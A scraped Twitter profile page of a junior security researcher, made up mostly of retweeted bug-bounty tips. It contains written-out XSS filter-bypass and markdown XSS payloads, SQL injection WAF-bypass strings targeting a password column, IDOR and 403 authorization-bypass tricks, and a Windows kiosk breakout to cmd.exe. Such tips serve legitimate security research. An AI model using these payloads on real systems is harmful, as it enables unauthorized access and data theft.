Christina Oh

@0xtina

Junior hacker at . Collection of resources. Tweets are representative of me only.

Singapore
Joined: May 2018

Tweets

  1. Retweeted
    11 hours ago

    XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()//

  2. Retweeted
    6 hours ago

    That’s genius. I wonder how many ssrf I’ve given up on and could have made work with this... 😭

  3. Retweeted
    11 hours ago

    Hey bug hunters! Want a look at some of the top vulnerabilities ever found on ? They just released the last blog post I wrote before leaving. Enjoy!

  4. Retweeted
    Jan 31

    If an application uses markdown, make sure to test it for xss. I used [Click here](javascript:alert(1)), to create a link via markdown and when the user clicks on Click here, the xss will get executed. Read this article.

  5. Retweeted
    Jan 29

    SQL Injection WAF bypass techniques 1.Nullbyte: %00' UNION SELECT password FROM Users WHERE username-'tom'-- 2. SQL Comments: '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--

  6. Retweeted
    Jan 27

    SpecterOps Adversary Tactics: PowerShell Course & Lab Material

  7. Retweeted
    Jan 27

    sqlmap can fail! Know how to fingerprint manually with db-unique functions:

    - MySQL - database()
    - MsSQL - db_name()
    - SQLite - sqlite_version()
    - PostgreSQL - current_database()

    The functions don't exist in other solutions, so if they work you know which one it is!

  8. Retweeted
    Jan 27

    Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? This could lead to interesting exploit scenarios with some email parsing libraries/code

  9. Retweeted
    Jan 27

    If you're asking yourself "is this the first time an AV was targeted by someone to own someone", you need to check this Github repository by

  10. Retweeted
    Jan 27

    There are some endpoints that show JSON, but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html”, and they show special chars, easy XSS ;)

  11. Retweeted
    Jan 27
  12. Retweeted
    Jan 27

    Windows Kiosk breakout tip: If you get a Printing panel, and the traditional methods don't work: Amongst the printers, select "SendTo OneNote" OneNote will launch -> Add new notebook On the Notebook -> New page Type: \\127.0.0.1\c$\windows\system32\cmd.exe Click the link

  13. Retweeted
    Jan 27

    Instant Admin Access!! always check JS files and request responses. This tool by is pretty good in looking for endpoints

  14. Retweeted
    Jan 27

    -API TIP:26/31- Looking for BOLA (IDOR) in APIs? got 401/403 errors? AuthZ bypass tricks:

    * Wrap ID with an array {“id”:111} --> {“id”:[111]}
    * JSON wrap {“id”:111} --> {“id”:{“id”:111}}
    * Send ID twice URL?id=<LEGIT>&id=<VICTIM>
    * Send wildcard {"user_id":"*"}

  15. Retweeted
    Jan 25

    THC RELEASE: Our favourite Tips, Tricks & Hacks. Help us and add your favourite tricks to the CHEAT SHEET:

  16. Retweeted
    Jan 24

    Here are my (updated) slides from for my talk "Owning The Cloud Through SSRF & PDF Generators" with Chris Holt from . Big thank you to , , , , , and !

  17. Retweeted
    Jan 22

    If you find 403 Forbidden while testing, try X-Original-URL and X-Rewrite-URL headers to bypass restrictions

  18. Retweeted
    Jan 18

    Here is my GitHub with many scripts useful for red teamers - Enjoy!

  19. Retweeted
    Jan 18
  20. Retweeted
    Jan 18

    RDP to RCE: When Fragmentation Goes Wrong AKA: What we know about CVE-2020-0609 and CVE-2020-0610.
